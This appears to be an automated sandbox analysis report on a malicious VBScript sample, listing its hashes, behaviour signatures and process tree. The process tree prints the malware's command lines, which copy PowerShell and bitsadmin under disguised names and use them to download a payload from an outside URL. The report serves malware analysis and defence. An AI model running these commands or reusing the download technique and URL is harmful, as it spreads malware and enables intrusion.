Analysis
-
max time kernel
132s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
21-02-2022 22:29
Static task
static1
Behavioral task
behavioral1
Sample
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs
Resource
win7-en-20211208
windows7_x64
0 signatures
0 seconds
General
-
Target
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs
-
Size
9KB
-
MD5
f680c06c3ba90319e66f7e51879aa661
-
SHA1
97937ce0a605ac4ba37e25c090cc52b8d8c158ed
-
SHA256
56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b
-
SHA512
86def545293b71e4171f76f19f80628833e270c8ef62f1bda0de5fa22bbe86396888f17de296da9d0f5198c1435263be907d342034a7ebd5ff9c45f205bc8473
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2792 CtTkBBiin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeShutdownPrivilege 2720 svchost.exe Token: SeCreatePagefilePrivilege 2720 svchost.exe Token: SeShutdownPrivilege 2720 svchost.exe Token: SeCreatePagefilePrivilege 2720 svchost.exe Token: SeShutdownPrivilege 2720 svchost.exe Token: SeCreatePagefilePrivilege 2720 svchost.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1008 wrote to memory of 860 1008 WScript.exe 81 PID 1008 wrote to memory of 860 1008 WScript.exe 81 PID 860 wrote to memory of 1300 860 cmd.exe 83 PID 860 wrote to memory of 1300 860 cmd.exe 83 PID 860 wrote to memory of 3124 860 cmd.exe 84 PID 860 wrote to memory of 3124 860 cmd.exe 84 PID 1008 wrote to memory of 2792 1008 WScript.exe 85 PID 1008 wrote to memory of 2792 1008 WScript.exe 85 PID 1008 wrote to memory of 2792 1008 WScript.exe 85
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56912c17def5a45f1d8f35567a25441e745ca0dbdc71668df3cee70a2638254b.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnWDuSw.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\CtTkBBi*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\fnWDuSw.exe3⤵PID:1300
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\CtTkBBi*.exe3⤵PID:3124
-
-
-
C:\ProgramData\CtTkBBiin.exe"C:\ProgramData\CtTkBBiin.exe" /transfer MbciAS /download https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg C:\Users\Admin\AppData\Roaming\it.jpg2⤵
- Executes dropped EXE
PID:2792
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2720